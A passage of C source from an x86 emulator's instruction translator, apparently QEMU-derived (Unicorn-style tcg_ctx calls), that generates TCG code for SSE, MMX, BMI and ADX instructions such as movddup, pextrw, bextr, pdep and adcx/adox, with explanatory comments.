gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(2))); break; case 0x312: /* movddup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); break; case 0x016: /* movhps */ case 0x116: /* movhpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); } else { /* movlhps */ rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } break; case 0x216: /* movshdup */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldo_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(1)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(1))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(3)), offsetof(CPUX86State,xmm_regs[rm].ZMM_L(3))); } gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(1))); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(2)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(3))); break; case 0x178: case 0x378: { int bit_index, field_length; if (b1 == 1 && reg != 0) goto illegal_op; field_length = x86_ldub_code(env, s) & 0x3F; bit_index = x86_ldub_code(env, s) & 0x3F; tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg])); if (b1 == 1) gen_helper_extrq_i(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, tcg_const_i32(tcg_ctx, bit_index), tcg_const_i32(tcg_ctx, field_length)); else gen_helper_insertq_i(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, tcg_const_i32(tcg_ctx, bit_index), tcg_const_i32(tcg_ctx, field_length)); } break; case 0x7e: /* movd ea, mm */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { tcg_gen_ld_i64(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx)); gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); } else #endif { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, 
offsetof(CPUX86State,fpregs[reg].mmx.MMX_L(0))); gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); } break; case 0x17e: /* movd ea, xmm */ #ifdef TARGET_X86_64 if (s->dflag == MO_64) { tcg_gen_ld_i64(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); gen_ldst_modrm(env, s, modrm, MO_64, OR_TMP0, 1); } else #endif { tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); gen_ldst_modrm(env, s, modrm, MO_32, OR_TMP0, 1); } break; case 0x27e: /* movq xmm, ea */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); } gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); break; case 0x7f: /* movq ea, mm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, fpregs[reg].mmx)); } else { rm = (modrm & 7); gen_op_movq(s, offsetof(CPUX86State, fpregs[rm].mmx), offsetof(CPUX86State,fpregs[reg].mmx)); } break; case 0x011: /* movups */ case 0x111: /* movupd */ case 0x029: /* movaps */ case 0x129: /* movapd */ case 0x17f: /* movdqa ea, xmm */ case 0x27f: /* movdqu ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_sto_env_A0(s, offsetof(CPUX86State, xmm_regs[reg])); } else { rm = (modrm & 7) | REX_B(s); gen_op_movo(s, offsetof(CPUX86State, xmm_regs[rm]), offsetof(CPUX86State,xmm_regs[reg])); } break; case 0x211: /* movss ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[reg].ZMM_L(0))); gen_op_st_v(s, MO_32, s->T0, s->A0); } else { rm = (modrm & 7) | REX_B(s); gen_op_movl(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_L(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_L(0))); } break; case 0x311: /* movsd ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); } break; case 0x013: /* movlps */ case 0x113: /* movlpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { goto illegal_op; } break; case 0x017: /* movhps */ case 0x117: /* movhpd */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); } else { goto illegal_op; } break; case 0x71: /* shift mm, im */ case 0x72: case 0x73: case 0x171: /* shift xmm, im */ case 0x172: case 0x173: if (b1 >= 2) { goto unknown_op; } val = x86_ldub_code(env, s); if (is_xmm) { tcg_gen_movi_tl(tcg_ctx, s->T0, val); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(1))); op1_offset = offsetof(CPUX86State,xmm_t0); } else { tcg_gen_movi_tl(tcg_ctx, s->T0, val); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_L(0))); tcg_gen_movi_tl(tcg_ctx, s->T0, 0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, mmx_t0.MMX_L(1))); op1_offset = offsetof(CPUX86State,mmx_t0); } sse_fn_epp = sse_op_table2[((b - 1) & 3) * 8 + (((modrm >> 3)) & 7)][b1]; if (!sse_fn_epp) { goto unknown_op; } if (is_xmm) { rm = (modrm & 7) | REX_B(s); 
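                /* The immediate count was staged in xmm_t0/mmx_t0 above as
                   op1; op2 selects the register operand, which is shifted
                   in place. */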
op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op2_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op1_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x050: /* movmskps */ rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm])); gen_helper_movmskps(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x150: /* movmskpd */ rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm])); gen_helper_movmskpd(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x02a: /* cvtpi2ps */ case 0x12a: /* cvtpi2pd */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,mmx_t0); gen_ldq_env_A0(s, op2_offset); } else { rm = (modrm & 7); op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } op1_offset = offsetof(CPUX86State,xmm_regs[reg]); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); switch(b >> 8) { case 0x0: gen_helper_cvtpi2ps(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; default: case 0x1: gen_helper_cvtpi2pd(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } break; case 0x22a: /* cvtsi2ss */ case 0x32a: /* cvtsi2sd */ ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); op1_offset = offsetof(CPUX86State,xmm_regs[reg]); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); if (ot == MO_32) { SSEFunc_0_epi sse_fn_epi = sse_op_table3ai[(b >> 8) & 1]; tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); sse_fn_epi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->tmp2_i32); } else { #ifdef TARGET_X86_64 SSEFunc_0_epl sse_fn_epl = sse_op_table3aq[(b >> 8) & 1]; sse_fn_epl(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->T0); #else goto illegal_op; #endif } break; case 0x02c: /* cvttps2pi */ case 0x12c: /* cvttpd2pi */ case 0x02d: /* cvtps2pi */ case 0x12d: /* cvtpd2pi */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); if (mod != 3) { gen_lea_modrm(env, s, modrm); op2_offset = offsetof(CPUX86State,xmm_t0); gen_ldo_env_A0(s, op2_offset); } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } op1_offset = offsetof(CPUX86State,fpregs[reg & 7].mmx); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); switch(b) { case 0x02c: gen_helper_cvttps2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x12c: gen_helper_cvttpd2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x02d: gen_helper_cvtps2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; case 0x12d: gen_helper_cvtpd2pi(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); break; } break; case 0x22c: /* cvttss2si */ case 0x32c: /* cvttsd2si */ case 0x22d: /* cvtss2si */ case 0x32d: /* cvtsd2si */ ot = mo_64_32(s->dflag); if (mod != 3) { gen_lea_modrm(env, s, modrm); if ((b >> 8) & 1) { gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.ZMM_Q(0))); } else { gen_op_ld_v(s, MO_32, s->T0, s->A0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_t0.ZMM_L(0))); } op2_offset = 
offsetof(CPUX86State,xmm_t0); } else { rm = (modrm & 7) | REX_B(s); op2_offset = offsetof(CPUX86State,xmm_regs[rm]); } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op2_offset); if (ot == MO_32) { SSEFunc_i_ep sse_fn_i_ep = sse_op_table3bi[((b >> 7) & 2) | (b & 1)]; sse_fn_i_ep(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); } else { #ifdef TARGET_X86_64 SSEFunc_l_ep sse_fn_l_ep = sse_op_table3bq[((b >> 7) & 2) | (b & 1)]; sse_fn_l_ep(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->ptr0); #else goto illegal_op; #endif } gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0xc4: /* pinsrw */ case 0x1c4: s->rip_offset = 1; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); val = x86_ldub_code(env, s); if (b1) { val &= 7; tcg_gen_st16_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[reg].ZMM_W(val))); } else { val &= 3; tcg_gen_st16_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[reg].mmx.MMX_W(val))); } break; case 0xc5: /* pextrw */ case 0x1c5: if (mod != 3) goto illegal_op; ot = mo_64_32(s->dflag); val = x86_ldub_code(env, s); if (b1) { val &= 7; rm = (modrm & 7) | REX_B(s); tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,xmm_regs[rm].ZMM_W(val))); } else { val &= 3; rm = (modrm & 7); tcg_gen_ld16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,fpregs[rm].mmx.MMX_W(val))); } reg = ((modrm >> 3) & 7) | rex_r; gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x1d6: /* movq ea, xmm */ if (mod != 3) { gen_lea_modrm(env, s, modrm); gen_stq_env_A0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0))); } else { rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(0)), offsetof(CPUX86State,xmm_regs[reg].ZMM_Q(0))); gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[rm].ZMM_Q(1))); } break; case 0x2d6: /* movq2dq */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); rm = (modrm & 7); gen_op_movq(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(0)), offsetof(CPUX86State,fpregs[rm].mmx)); gen_op_movq_env_0(s, offsetof(CPUX86State, xmm_regs[reg].ZMM_Q(1))); break; case 0x3d6: /* movdq2q */ gen_helper_enter_mmx(tcg_ctx, tcg_ctx->cpu_env); rm = (modrm & 7) | REX_B(s); gen_op_movq(s, offsetof(CPUX86State, fpregs[reg & 7].mmx), offsetof(CPUX86State,xmm_regs[rm].ZMM_Q(0))); break; case 0xd7: /* pmovmskb */ case 0x1d7: if (mod != 3) goto illegal_op; if (b1) { rm = (modrm & 7) | REX_B(s); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State, xmm_regs[rm])); gen_helper_pmovmskb_xmm(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); } else { rm = (modrm & 7); tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, offsetof(CPUX86State, fpregs[rm].mmx)); gen_helper_pmovmskb_mmx(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, s->ptr0); } reg = ((modrm >> 3) & 7) | rex_r; tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); break; case 0x138: case 0x038: b = modrm; if ((b & 0xf0) == 0xf0) { goto do_0f_38_fx; } modrm = x86_ldub_code(env, s); rm = modrm & 7; reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (b1 >= 2) { goto unknown_op; } sse_fn_epp = sse_op_table6[b].op[b1]; if (!sse_fn_epp) { goto unknown_op; } if (!(s->cpuid_ext_features & sse_op_table6[b].ext_mask)) goto illegal_op; if (b1) { op1_offset = offsetof(CPUX86State,xmm_regs[reg]); if (mod == 3) { op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); } else { op2_offset = offsetof(CPUX86State,xmm_t0); gen_lea_modrm(env, s, modrm); switch (b) { case 0x20: case 0x30: /* pmovsxbw, 
pmovzxbw */ case 0x23: case 0x33: /* pmovsxwd, pmovzxwd */ case 0x25: case 0x35: /* pmovsxdq, pmovzxdq */ gen_ldq_env_A0(s, op2_offset + offsetof(ZMMReg, ZMM_Q(0))); break; case 0x21: case 0x31: /* pmovsxbd, pmovzxbd */ case 0x24: case 0x34: /* pmovsxwq, pmovzxwq */ tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUL); tcg_gen_st_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, op2_offset + offsetof(ZMMReg, ZMM_L(0))); break; case 0x22: case 0x32: /* pmovsxbq, pmovzxbq */ tcg_gen_qemu_ld_tl(tcg_ctx, s->tmp0, s->A0, s->mem_index, MO_LEUW); tcg_gen_st16_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_env, op2_offset + offsetof(ZMMReg, ZMM_W(0))); break; case 0x2a: /* movntqda */ gen_ldo_env_A0(s, op1_offset); return; default: gen_ldo_env_A0(s, op2_offset); } } } else { op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); if (mod == 3) { op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); } else { op2_offset = offsetof(CPUX86State,mmx_t0); gen_lea_modrm(env, s, modrm); gen_ldq_env_A0(s, op2_offset); } } if (sse_fn_epp == SSE_SPECIAL) { goto unknown_op; } tcg_gen_addi_ptr(tcg_ctx, s->ptr0, tcg_ctx->cpu_env, op1_offset); tcg_gen_addi_ptr(tcg_ctx, s->ptr1, tcg_ctx->cpu_env, op2_offset); sse_fn_epp(tcg_ctx, tcg_ctx->cpu_env, s->ptr0, s->ptr1); if (b == 0x17) { set_cc_op(s, CC_OP_EFLAGS); } break; case 0x238: case 0x338: do_0f_38_fx: /* Various integer extensions at 0f 38 f[0-f]. */ b = modrm | (b1 << 8); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; switch (b) { case 0x3f0: /* crc32 Gd,Eb */ case 0x3f1: /* crc32 Gd,Ey */ do_crc32: if (!(s->cpuid_ext_features & CPUID_EXT_SSE42)) { goto illegal_op; } if ((b & 0xff) == 0xf0) { ot = MO_8; } else if (s->dflag != MO_64) { ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); } else { ot = MO_64; } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_regs[reg]); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_helper_crc32(tcg_ctx, s->T0, s->tmp2_i32, s->T0, tcg_const_i32(tcg_ctx, 8 << ot)); ot = mo_64_32(s->dflag); gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x1f0: /* crc32 or movbe */ case 0x1f1: /* For these insns, the f3 prefix is supposed to have priority over the 66 prefix, but that's not what we implement above setting b1. */ if (s->prefix & PREFIX_REPNZ) { goto do_crc32; } /* FALLTHRU */ case 0x0f0: /* movbe Gy,My */ case 0x0f1: /* movbe My,Gy */ if (!(s->cpuid_ext_features & CPUID_EXT_MOVBE)) { goto illegal_op; } if (s->dflag != MO_64) { ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); } else { ot = MO_64; } gen_lea_modrm(env, s, modrm); if ((b & 1) == 0) { tcg_gen_qemu_ld_tl(tcg_ctx, s->T0, s->A0, s->mem_index, ot | MO_BE); gen_op_mov_reg_v(s, ot, reg, s->T0); } else { tcg_gen_qemu_st_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->A0, s->mem_index, ot | MO_BE); } break; case 0x0f2: /* andn Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[s->vex_v]); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0x0f7: /* bextr Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); { TCGv bound, zero; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Extract START, and shift the operand. Shifts larger than operand size get zeros. 
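   (Added commentary: BEXTR reads START from bits 7:0 and LEN from bits
   15:8 of the second source register, computing
   (src >> START) & ((1 << LEN) - 1). As a worked example, a control
   value of 0x0404 applied to 0xF0 gives (0xF0 >> 4) & 0xF = 0xF.)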
*/ tcg_gen_ext8u_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[s->vex_v]); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, s->A0); bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, s->T0, s->A0, bound, s->T0, zero); tcg_temp_free(tcg_ctx, zero); /* Extract the LEN into a mask. Lengths larger than operand size get all ones. */ tcg_gen_extract_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[s->vex_v], 8, 8); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, s->A0, s->A0, bound, s->A0, bound); tcg_temp_free(tcg_ctx, bound); tcg_gen_movi_tl(tcg_ctx, s->T1, 1); tcg_gen_shl_tl(tcg_ctx, s->T1, s->T1, s->A0); tcg_gen_subi_tl(tcg_ctx, s->T1, s->T1, 1); tcg_gen_and_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); } break; case 0x0f5: /* bzhi Gy, Ey, By */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); tcg_gen_ext8u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); { TCGv bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); /* Note that since we're using BMILG (in order to get O cleared) we need to store the inverse into C. */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_cc_src, s->T1, bound); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, s->T1, s->T1, bound, bound, s->T1); tcg_temp_free(tcg_ctx, bound); } tcg_gen_movi_tl(tcg_ctx, s->A0, -1); tcg_gen_shl_tl(tcg_ctx, s->A0, s->A0, s->T1); tcg_gen_andc_tl(tcg_ctx, s->T0, s->T0, s->A0); gen_op_mov_reg_v(s, ot, reg, s->T0); gen_op_update1_cc(s); set_cc_op(s, CC_OP_BMILGB + ot); break; case 0x3f6: /* mulx By, Gy, rdx, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); switch (ot) { default: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_mulu2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[s->vex_v], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp3_i32); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_mulu2_i64(tcg_ctx, s->T0, s->T1, s->T0, tcg_ctx->cpu_regs[R_EDX]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[s->vex_v], s->T0); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1); break; #endif } break; case 0x3f5: /* pdep Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Note that by zero-extending the source operand, we automatically handle zero-extending the result. */ if (ot == MO_64) { tcg_gen_mov_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } else { tcg_gen_ext32u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } gen_helper_pdep(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0); break; case 0x2f5: /* pext Gy, By, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) || !(s->prefix & PREFIX_VEX) || s->vex_l != 0) { goto illegal_op; } ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Note that by zero-extending the source operand, we automatically handle zero-extending the result. 
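   (Added commentary: PEXT gathers the source bits selected by the mask
   and packs them contiguously at the low end, e.g.
   pext(src=0b10010, mask=0b11010) reads bits 1, 3 and 4 of src and
   yields 0b101.)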
*/ if (ot == MO_64) { tcg_gen_mov_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } else { tcg_gen_ext32u_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[s->vex_v]); } gen_helper_pext(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0); break; case 0x1f6: /* adcx Gy, Ey */ case 0x2f6: /* adox Gy, Ey */ if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_ADX)) { goto illegal_op; } else { TCGv carry_in, carry_out, zero; int end_op; ot = mo_64_32(s->dflag); gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); /* Re-use the carry-out from a previous round. */ carry_in = NULL; carry_out = (b == 0x1f6 ? tcg_ctx->cpu_cc_dst : tcg_ctx->cpu_cc_src2); switch (s->cc_op) { case CC_OP_ADCX: if (b == 0x1f6) { carry_in = tcg_ctx->cpu_cc_dst; end_op = CC_OP_ADCX; } else { end_op = CC_OP_ADCOX; } break; case CC_OP_ADOX: if (b == 0x1f6) { end_op = CC_OP_ADCOX; } else { carry_in = tcg_ctx->cpu_cc_src2; end_op = CC_OP_ADOX; } break; case CC_OP_ADCOX: end_op = CC_OP_ADCOX; carry_in = carry_out; break; default: end_op = (b == 0x1f6 ? CC_OP_ADCX : CC_OP_ADOX); break; } /* If we can't reuse carry-out, get it out of EFLAGS. */ if (!carry_in) { if (s->cc_op != CC_OP_ADCX && s->cc_op != CC_OP_ADOX) { gen_compute_eflags(s); } carry_in = s->tmp0; tcg_gen_extract_tl(tcg_ctx, carry_in, tcg_ctx->cpu_cc_src, ctz32(b == 0x1f6 ? CC_C : CC_O), 1); } switch (ot) { #ifdef TARGET_X86_64 case MO_32: /* If we know TL is 64-bit, and we want a 32-bit result, just do everything in 64-bit arithmetic. */ tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg]); tcg_gen_ext32u_i64(tcg_ctx, s->T0, s->T0); tcg_gen_add_i64(tcg_ctx, s->T0, s->T0, tcg_ctx->cpu_regs[reg]); tcg_gen_add_i64(tcg_ctx, s->T0, s->T0, carry_in); tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T0); tcg_gen_shri_i64(tcg_ctx, carry_out, s->T0, 32); break; #endif default: /* Otherwise compute the carry-out in two steps. 
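   (Added commentary: the first add2 below folds carry_in into the
   source operand and captures the intermediate carry; the second adds
   that sum into the destination register, accumulating the final carry
   in carry_out, i.e. cpu_cc_dst for ADCX/CF or cpu_cc_src2 for
   ADOX/OF.)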
